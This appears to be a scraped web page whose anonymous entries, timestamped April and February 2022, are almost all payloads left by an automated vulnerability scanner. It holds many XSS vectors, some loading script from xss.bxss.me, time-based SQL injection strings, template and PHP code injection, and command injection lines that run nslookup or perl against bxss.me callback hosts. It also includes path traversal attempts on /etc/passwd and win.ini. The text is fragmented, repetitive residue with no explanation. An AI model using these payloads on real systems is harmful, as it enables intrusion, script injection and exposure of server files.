555<WNJOT8>YIRM7[!+!]</WNJOT8>
1
1
19/04/2022 02:26
555Ht5Pd <ScRiPt >PfJl(9797)</ScRiPt>
1
1}body{acu:Expre/**/SSion(YMAK(9638))}
19/04/2022 02:26
555
1
1
19/04/2022 02:26
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%4A%6F%32%289286%29%3C%2F%73%43%72%69%70%54%3E
1
1
19/04/2022 02:26
555}body{acu:Expre/**/SSion(PfJl(9413))}
1
1
19/04/2022 02:26
<a HrEF=jaVaScRiPT:>
1
1
19/04/2022 02:26
555<img/src=">" onerror=alert(9586)>
1
1
19/04/2022 02:25
<a HrEF=http://xss.bxss.me></a>
<
<a HrEF=jaVaScRiPT:>
19/04/2022 02:25
555
1
1
19/04/2022 02:25
555<img src=xyz OnErRor=wJo2(9323)>
1
1
19/04/2022 02:25
555<input autofocus onfocus=PfJl(9709)>
<
<a HrEF=http://xss.bxss.me></a>
19/04/2022 02:25
555
1
1
19/04/2022 02:25
%F6<img acu onmouseover=PfJl(92541) //%F6>
1
1
19/04/2022 02:25
555&lt;ScRiPt&gt;PfJl(9683)&lt;/sCripT&gt;
1
1
19/04/2022 02:25
555\u003CScRiPt\PfJl(9223)\u003C/sCripT\u003E
1
1<input autofocus onfocus=YMAK(9008)>
19/04/2022 02:24
555
1
1
19/04/2022 02:24
%35%35%35%3C%53%63%52%69%50%74%20%3E%50%66%4A%6C%289256%29%3C%2F%73%43%72%69%70%54%3E
%
%F6<img acu onmouseover=YMAK(94381) //%F6>
19/04/2022 02:24
555
1
1
19/04/2022 02:24
555<img/src=">" onerror=alert(9090)>
1
1
19/04/2022 02:24
555<img src=//xss.bxss.me/t/dot.gif onload=wJo2(9814)>
1
1
19/04/2022 02:24
555<img src=xyz OnErRor=PfJl(9169)>
1
1
19/04/2022 02:24
555<img src=//xss.bxss.me/t/dot.gif onload=PfJl(9495)>
1
1
19/04/2022 02:24
555<body onload=wJo2(9628)>
1
1
19/04/2022 02:24
555<body onload=PfJl(9887)>
1
1&lt;ScRiPt&gt;YMAK(9273)&lt;/sCripT&gt;
19/04/2022 02:23
555
1
1
19/04/2022 02:22
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9428'>
1
1
19/04/2022 02:22
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9059'>
1
1\u003CScRiPt\YMAK(9915)\u003C/sCripT\u003E
19/04/2022 02:22
555
1
1
19/04/2022 02:22
555<isindex type=image src=1 onerror=PfJl(9623)>
1
1
19/04/2022 02:22
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9227></ScRiPt>
%
%31%3C%53%63%52%69%50%74%20%3E%59%4D%41%4B%289907%29%3C%2F%73%43%72%69%70%54%3E
19/04/2022 02:22
555
1
1
19/04/2022 02:22
555<ScRiPt >PfJl(9518)</ScRiPt>
1
1
19/04/2022 02:22
555<isindex type=image src=1 onerror=wJo2(9216)>
1
1<img/src=">" onerror=alert(9635)>
19/04/2022 02:21
555
1
1
19/04/2022 02:21
555<ScR<ScRiPt>IpT>PfJl(9047)</sCr<ScRiPt>IpT>
1
1
19/04/2022 02:21
555<script>PfJl(9049)</script>
1
1<img src=xyz OnErRor=YMAK(9717)>
19/04/2022 02:21
555
1
1
19/04/2022 02:21
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9131></ScRiPt>
1
1
19/04/2022 02:21
555<W93RNM>JPVMB[!+!]</W93RNM>
1
1
19/04/2022 02:21
555<ScRiPt >wJo2(9362)</ScRiPt>
1
1
19/04/2022 02:20
555<ScRiPt >PfJl(9141)</ScRiPt>
1
1
19/04/2022 02:20
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1<img src=//xss.bxss.me/t/dot.gif onload=YMAK(9107)>
19/04/2022 02:20
555
1
1
19/04/2022 02:20
555<ScR<ScRiPt>IpT>wJo2(9084)</sCr<ScRiPt>IpT>
1
1<body onload=YMAK(9282)>
19/04/2022 02:20
555
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9200'>
19/04/2022 02:20
555
1
1
19/04/2022 02:19
555<script>wJo2(9801)</script>
1
1
19/04/2022 02:19
acx__${98991*97996}__::.x
1
1<isindex type=image src=1 onerror=YMAK(9587)>
19/04/2022 02:19
555
1
1
19/04/2022 02:19
acx[[${98991*97996}]]xca
1
1
19/04/2022 02:19
555<WA2R2Y>W4WKT[!+!]</WA2R2Y>
1
1
19/04/2022 02:19
acx{{98991*97996}}xca
1
1
19/04/2022 02:19
555
1
1
19/04/2022 02:19
555<ScRiPt >wJo2(9899)</ScRiPt>
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9599></ScRiPt>
19/04/2022 02:19
555
1
1
19/04/2022 02:19
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
1
19/04/2022 02:18
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
19/04/2022 02:18
555
1
1<ScRiPt >YMAK(9174)</ScRiPt>
19/04/2022 02:18
555
1
1
19/04/2022 02:18
<th:t="${acx}#foreach
1
1<ScR<ScRiPt>IpT>YMAK(9606)</sCr<ScRiPt>IpT>
19/04/2022 02:18
555
1
1
19/04/2022 02:18
555
1
1
19/04/2022 02:18
acx__${98991*97996}__::.x
1
1
19/04/2022 02:18
<%={{={@{#{${acx}}%>
1
1<script>YMAK(9836)</script>
19/04/2022 02:18
555
1
1
19/04/2022 02:18
acx[[${98991*97996}]]xca
1
1
19/04/2022 02:18
acux4580%C0%BEz1%C0%BCz2a%90bcxuca4580
1
1
19/04/2022 02:18
acu7201<s1﹥s2ʺs3ʹuca7201
1
1<WHAV2O>REH8O[!+!]</WHAV2O>
19/04/2022 02:18
555
1
1
19/04/2022 02:18
acx{{98991*97996}}xca
1
1
19/04/2022 02:18
5559228352
1
1
19/04/2022 02:17
'"()&%<acx><ScRiPt >PfJl(9182)</ScRiPt>
1
1
19/04/2022 02:17
555
1
1
19/04/2022 02:17
555'"()&%<acx><ScRiPt >PfJl(9858)</ScRiPt>
1
1<ScRiPt >YMAK(9819)</ScRiPt>
19/04/2022 02:17
555
1
1
19/04/2022 02:17
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 02:17
555
1
1<aoRkuIn<
19/04/2022 02:17
555
a
acx__${98991*97996}__::.x
19/04/2022 02:17
555
1
1
19/04/2022 02:17
555
a
acx[[${98991*97996}]]xca
19/04/2022 02:16
555
1
1
19/04/2022 02:16
<th:t="${acx}#foreach
1
1<img sRc='http://attacker-9623/log.php?
19/04/2022 02:16
555
1
1<ab56Aka x=9539>
19/04/2022 02:16
555
a
acx{{98991*97996}}xca
19/04/2022 02:16
555
1
1
19/04/2022 02:16
555
1
1
19/04/2022 02:16
555
1
1
19/04/2022 02:16
<%={{={@{#{${acx}}%>
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 02:15
555
1
1
19/04/2022 02:15
555
1
1
19/04/2022 02:15
acux6713%C0%BEz1%C0%BCz2a%90bcxuca6713
1
1<ifRAme sRc=9505.com></IfRamE>
19/04/2022 02:15
555
1
1<W9YLSZ>AAGKA[!+!]</W9YLSZ>
19/04/2022 02:14
555
<
<th:t="${acx}#foreach
19/04/2022 02:14
555
1
1
19/04/2022 02:14
555
1
1XyP5Q <ScRiPt >PfJl(9819)</ScRiPt>
19/04/2022 02:14
555
1
1}body{acu:Expre/**/SSion(PfJl(9638))}
19/04/2022 02:14
555
<
<a HrEF=jaVaScRiPT:>
19/04/2022 02:14
555
1
1
19/04/2022 02:14
acu6071<s1﹥s2ʺs3ʹuca6071
<
<a HrEF=http://xss.bxss.me></a>
19/04/2022 02:14
555
1
1
19/04/2022 02:14
5559203520
<
<%={{={@{#{${acx}}%>
19/04/2022 02:14
555
1
1<input autofocus onfocus=PfJl(9046)>
19/04/2022 02:13
555
%
%F6<img acu onmouseover=PfJl(94781) //%F6>
19/04/2022 02:13
555
1
1&lt;ScRiPt&gt;PfJl(9031)&lt;/sCripT&gt;
19/04/2022 02:13
555
1
1\u003CScRiPt\PfJl(9032)\u003C/sCripT\u003E
19/04/2022 02:13
555
a
acux7806%C0%BEz1%C0%BCz2a%90bcxuca7806
19/04/2022 02:13
555
%
%31%3C%53%63%52%69%50%74%20%3E%50%66%4A%6C%289032%29%3C%2F%73%43%72%69%70%54%3E
19/04/2022 02:13
555
1
1<img/src=">" onerror=alert(9899)>
19/04/2022 02:13
555
1
1
19/04/2022 02:13
'"()&%<acx><ScRiPt >wJo2(9272)</ScRiPt>
a
acu9977<s1﹥s2ʺs3ʹuca9977
19/04/2022 02:13
555
1
1<img src=xyz OnErRor=PfJl(9117)>
19/04/2022 02:12
555
1
1<img src=//xss.bxss.me/t/dot.gif onload=PfJl(9411)>
19/04/2022 02:12
555
1
19045168
19/04/2022 02:12
555
1
1<body onload=PfJl(9864)>
19/04/2022 02:12
555
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9654'>
19/04/2022 02:12
555
'
'"()&%<acx><ScRiPt >YMAK(9493)</ScRiPt>
19/04/2022 02:12
555
1
1<isindex type=image src=1 onerror=PfJl(9505)>
19/04/2022 02:12
555
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9671></ScRiPt>
19/04/2022 02:12
555
1
1
19/04/2022 02:12
555'"()&%<acx><ScRiPt >wJo2(9161)</ScRiPt>
1
1'"()&%<acx><ScRiPt >YMAK(9639)</ScRiPt>
19/04/2022 02:12
555
1
1<ScRiPt >PfJl(9122)</ScRiPt>
19/04/2022 02:12
555
1
1<ScR<ScRiPt>IpT>PfJl(9884)</sCr<ScRiPt>IpT>
19/04/2022 02:11
555
1
1<script>PfJl(9881)</script>
19/04/2022 02:11
555
1
1<WEGAVK>19B1C[!+!]</WEGAVK>
19/04/2022 02:11
555
1
1<ScRiPt >PfJl(9639)</ScRiPt>
19/04/2022 02:10
555
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 02:10
555
a
acx__${98991*97996}__::.x
19/04/2022 02:10
555
a
acx[[${98991*97996}]]xca
19/04/2022 02:10
555
a
acx{{98991*97996}}xca
19/04/2022 02:10
555
1
1
19/04/2022 02:10
555
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 02:10
555
1
1
19/04/2022 02:09
555
<
<th:t="${acx}#foreach
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
<
<%={{={@{#{${acx}}%>
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
a
acux4681%C0%BEz1%C0%BCz2a%90bcxuca4681
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
555
1
1
19/04/2022 02:09
@@YanNC
1
1
19/04/2022 02:09
1'"
1
1
19/04/2022 02:09
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1
19/04/2022 02:09
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
19/04/2022 02:09
Sn0dN8GP')) OR 352=(SELECT 352 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:09
HIQ8SLBm') OR 888=(SELECT 888 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:09
n6Cfj5XW' OR 509=(SELECT 509 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:09
-1)) OR 859=(SELECT 859 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:09
-5) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:09
-5 OR 143=(SELECT 143 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:08
StAY3E2F')); waitfor delay '0:0:15' --
a
acu2254<s1﹥s2ʺs3ʹuca2254
19/04/2022 02:08
555
1
1
19/04/2022 02:08
msTNVlNL'); waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
Y8vYC9T9'; waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
1 waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
-1)); waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
-1); waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
-1; waitfor delay '0:0:15' --
1
1
19/04/2022 02:08
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
19/04/2022 02:08
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
19/04/2022 02:08
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
19/04/2022 02:08
if(now()=sysdate(),sleep(15),0)
1
1
19/04/2022 02:08
-1" OR 2+306-306-1=0+0+0+1 --
1
1
19/04/2022 02:08
-1' OR 2+727-727-1=0+0+0+1 or 'qjCTIiOQ'='
1
1
19/04/2022 02:08
-1' OR 2+168-168-1=0+0+0+1 --
1
1
19/04/2022 02:08
-1 OR 2+512-512-1=0+0+0+1
1
1
19/04/2022 02:08
-1 OR 2+321-321-1=0+0+0+1 --
1
1
19/04/2022 02:08
555
1
19136053
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
@
@@nTdrI
19/04/2022 02:08
555
1
1'"
19/04/2022 02:08
555
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
19/04/2022 02:08
555
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
19/04/2022 02:08
555
W
WCrHiUU1')) OR 760=(SELECT 760 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
'
'"()&%<acx><ScRiPt >PfJl(9573)</ScRiPt>
19/04/2022 02:08
555
W
WHEWFrv8') OR 269=(SELECT 269 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
X
Xq0GZOo7' OR 684=(SELECT 684 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1)) OR 708=(SELECT 708 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
-
-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
-
-5 OR 296=(SELECT 296 FROM PG_SLEEP(15))--
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
Z
ZVKjNy56')); waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
<!--
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
'"
1
1
19/04/2022 02:08
comment/.
1
1
19/04/2022 02:08
555
<
<!--
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
comment
1
1
19/04/2022 02:08
555
c
comment/.
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1'"()&%<acx><ScRiPt >PfJl(9212)</ScRiPt>
19/04/2022 02:08
555
1
1
19/04/2022 02:08
/xfs.bxss.me
'
'"
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
/
/xfs.bxss.me
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
19/04/2022 02:08
555
)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555&n921607=v943844
c
comment
19/04/2022 02:08
555
c
cG539Ht9'); waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
'.print(md5(31337)).'
1
1
19/04/2022 02:08
555
e
eMyhiZcG'; waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
${@print(md5(31337))}\
1
1
19/04/2022 02:08
'+'A'.concat(70-3).concat(22*4).concat(107).concat(79).concat(101).concat(83)+(require'socket' Socket.gethostbyname('hitbd'+'lvqpfbqcc5806.bxss.me.')[3].to_s)+'
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
${@print(md5(31337))}
1
1
19/04/2022 02:08
"+"A".concat(70-3).concat(22*4).concat(106).concat(70).concat(119).concat(77)+(require"socket" Socket.gethostbyname("hitjs"+"ztjiygqsadf3b.bxss.me.")[3].to_s)+"
1
1
19/04/2022 02:08
";print(md5(31337));$a="
1
1 waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
';print(md5(31337));$a='
1
1
19/04/2022 02:08
bxss.me/t/xss.html?%00
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
19/04/2022 02:08
555
'
'.print(md5(31337)).'
19/04/2022 02:08
555
1
1
19/04/2022 02:08
HttP://bxss.me/t/xss.html?%00
-
-1)); waitfor delay '0:0:15' --
19/04/2022 02:08
555
$
${@print(md5(31337))}\
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
b
bxss.me/t/xss.html?%00
19/04/2022 02:08
555
$
${@print(md5(31337))}
19/04/2022 02:08
555
1
1
19/04/2022 02:08
'"()
H
HttP://bxss.me/t/xss.html?%00
19/04/2022 02:08
555
"
";print(md5(31337));$a="
19/04/2022 02:08
555
-
-1); waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
'
';print(md5(31337));$a='
19/04/2022 02:08
555
'
'"()
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
;
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1; waitfor delay '0:0:15' --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
".gethostbyname(lc("hithy"."puuudvvd0fa0a.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(78).chr(122).chr(79)."
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
'.gethostbyname(lc('hitet'.'zmdwvbivaa5c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(116).chr(90).'
1
1
19/04/2022 02:08
555
(
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
"
".gethostbyname(lc("hitpk"."vxetlozke779f.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(76).chr(107).chr(87)."
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
'
'.gethostbyname(lc('hitis'.'jpiyouol8a77b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(80).chr(117).chr(87).'
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
19/04/2022 02:08
555
1
1
19/04/2022 02:08
bxss.me
1
1
19/04/2022 02:08
^(#$!@#$)(()))******
1
1
19/04/2022 02:08
http://bxss.me/t/fit.txt?.jpg
1
1
19/04/2022 02:08
!(()&&!|*|*|
1
1
19/04/2022 02:08
Http://bxss.me/t/fit.txt
Ẩn danh
19/04/2022 02:08
555
1
1
19/04/2022 02:08
)
1
1
19/04/2022 02:08
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
^
^(#$!@#$)(()))******
19/04/2022 02:08
555
i
if(now()=sysdate(),sleep(15),0)
19/04/2022 02:08
555
!
!(()&&!|*|*|
19/04/2022 02:08
555
1
1
19/04/2022 02:08
;(nslookup hitoymblhqaze26183.bxss.me||perl -e "gethostbyname('hitoymblhqaze26183.bxss.me')")|(nslookup hitoymblhqaze26183.bxss.me||perl -e "gethostbyname('hitoymblhqaze26183.bxss.me')")&(nslookup hitoymblhqaze26183.bxss.me||perl -e "gethostbyname('hitoymblhqaze26183.bxss.me')")
)
)
19/04/2022 02:08
555
1
1
19/04/2022 02:08
`(nslookup hitvffgkvtinm1d742.bxss.me||perl -e "gethostbyname('hitvffgkvtinm1d742.bxss.me')")`
b
bxss.me
19/04/2022 02:08
555
1
1
19/04/2022 02:08
|(nslookup hitxperirqrmt557d8.bxss.me||perl -e "gethostbyname('hitxperirqrmt557d8.bxss.me')")
h
http://bxss.me/t/fit.txt?.jpg
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
H
Http://bxss.me/t/fit.txt
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
&(nslookup hitdcocuizqfw3e1ec.bxss.me||perl -e "gethostbyname('hitdcocuizqfw3e1ec.bxss.me')")&'\"`0&(nslookup hitdcocuizqfw3e1ec.bxss.me||perl -e "gethostbyname('hitdcocuizqfw3e1ec.bxss.me')")&`'
1
1
19/04/2022 02:08
555
1
1&n962260=v934957
19/04/2022 02:08
555
1
1
19/04/2022 02:08
$(nslookup hitlwxqkuenbo82791.bxss.me||perl -e "gethostbyname('hitlwxqkuenbo82791.bxss.me')")
h
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
(nslookup hitzsbmpsmvtveb058.bxss.me||perl -e "gethostbyname('hitzsbmpsmvtveb058.bxss.me')")
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1" OR 2+666-666-1=0+0+0+1 --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
|echo wayoab$()\ xgjfpb\nz^xyu||a #' |echo wayoab$()\ xgjfpb\nz^xyu||a #|" |echo wayoab$()\ xgjfpb\nz^xyu||a #
1
1
19/04/2022 02:08
${9999001+9999683}
1
1
19/04/2022 02:08
555<esi:include src="http://bxss.me/rpb.png"/>
$
${9999368+9999166}
19/04/2022 02:08
555
-
-1' OR 2+172-172-1=0+0+0+1 or 'UzjVctjl'='
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1<esi:include src="http://bxss.me/rpb.png"/>
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1' OR 2+571-571-1=0+0+0+1 --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1 OR 2+62-62-1=0+0+0+1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
-
-1 OR 2+330-330-1=0+0+0+1 --
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
&echo jhoouu$()\ rmlsuf\nz^xyu||a #' &echo jhoouu$()\ rmlsuf\nz^xyu||a #|" &echo jhoouu$()\ rmlsuf\nz^xyu||a #
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
../555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
echo cyrbdh$()\ rmduux\nz^xyu||a #' &echo cyrbdh$()\ rmduux\nz^xyu||a #|" &echo cyrbdh$()\ rmduux\nz^xyu||a #
1
1
19/04/2022 02:08
../../../../../../../../../../../../../../windows/win.ini
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
"+response.write(9149093*9385731)+"
1
1
19/04/2022 02:08
../../../../../../../../../../../../../../etc/passwd
.
../1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
'+response.write(9149093*9385731)+'
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
response.write(9149093*9385731)
`
`(nslookup hitajfvpdrwxma72d5.bxss.me||perl -e "gethostbyname('hitajfvpdrwxma72d5.bxss.me')")`
19/04/2022 02:08
555
"
"+response.write(9893162*9942785)+"
19/04/2022 02:08
555
.
../../../../../../../../../../../../../../windows/win.ini
19/04/2022 02:08
555
|
|(nslookup hittyfftgustg60625.bxss.me||perl -e "gethostbyname('hittyfftgustg60625.bxss.me')")
19/04/2022 02:08
555
'
'+response.write(9893162*9942785)+'
19/04/2022 02:08
555
.
../../../../../../../../../../../../../../etc/passwd
19/04/2022 02:08
555
Ẩn danh
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
$
$(nslookup hitzhkyphezoi084dd.bxss.me||perl -e "gethostbyname('hitzhkyphezoi084dd.bxss.me')")
19/04/2022 02:08
555
(
(nslookup hitfwxlfsrsezf22ed.bxss.me||perl -e "gethostbyname('hitfwxlfsrsezf22ed.bxss.me')")
19/04/2022 02:08
555
1
1
19/04/2022 02:08
sthGeMPs
|
|echo atxhht$()\ sgsfiz\nz^xyu||a #' |echo atxhht$()\ sgsfiz\nz^xyu||a #|" |echo atxhht$()\ sgsfiz\nz^xyu||a #
19/04/2022 02:08
555
T
T9Q0z78A
19/04/2022 02:08
555
&
&echo qvvvqw$()\ ubwpjg\nz^xyu||a #' &echo qvvvqw$()\ ubwpjg\nz^xyu||a #|" &echo qvvvqw$()\ ubwpjg\nz^xyu||a #
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
e
echo derfoc$()\ gnhmys\nz^xyu||a #' &echo derfoc$()\ gnhmys\nz^xyu||a #|" &echo derfoc$()\ gnhmys\nz^xyu||a #
19/04/2022 02:08
555
1
1
19/04/2022 02:08
/../../../../../../../../../../windows/system32/BITSADMIN.exe
/
/../../../../../../../../../../windows/system32/BITSADMIN.exe
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
r
response.write(9893162*9942785)
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
1
1
19/04/2022 02:08
1EplQzbrO
1
1M7a2synO
19/04/2022 02:08
555
1
1
19/04/2022 02:08
555
8
88952634
07/02/2022 08:08
88952634'
8
88952634
07/02/2022 08:08
88952634'||'
8
88952634
07/02/2022 08:08
88952634'
8
88952634
07/02/2022 08:08
88952634'+'
8
88952634
07/02/2022 08:08
88952634s3
8
88952634
07/02/2022 08:08
88952634-0
8
88952634
07/02/2022 08:08
88952634'`"(
8
88952634'
07/02/2022 08:08
88952634
8
88952634'||'
07/02/2022 08:08
88952634
8
88952634'
07/02/2022 08:07
88952634
8
88952634'+'
07/02/2022 08:07
88952634
8
88952634s3
07/02/2022 08:07
88952634
8
88952634-0
07/02/2022 08:07
88952634
8
88952634'`"(
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
07/02/2022 08:07
88952634
8
88952634
06/02/2022 17:22
88952634'
8
88952634
06/02/2022 17:22
88952634'||'
8
88952634
06/02/2022 17:22
88952634'
8
88952634
06/02/2022 17:22
88952634'+'
8
88952634
06/02/2022 17:22
88952634s3
8
88952634
06/02/2022 17:22
88952634-0
8
88952634
06/02/2022 17:22
88952634'`"(
8
88952634'
06/02/2022 17:22
88952634
8
88952634'||'
06/02/2022 17:22
88952634
8
88952634'
06/02/2022 17:22
88952634
8
88952634'+'
06/02/2022 17:22
88952634
8
88952634s3
06/02/2022 17:22
88952634
8
88952634-0
06/02/2022 17:22
88952634
8
88952634'`"(
06/02/2022 17:22
88952634
8
88952634
06/02/2022 17:22
88952634
8
88952634
06/02/2022 17:22
88952634
8
88952634
06/02/2022 17:22
88952634
8
88952634
06/02/2022 17:21
88952634
8
88952634
06/02/2022 17:21
88952634
8
88952634
06/02/2022 17:21
88952634
8
88952634
06/02/2022 17:21
88952634
8
88952634
06/02/2022 17:21
88952634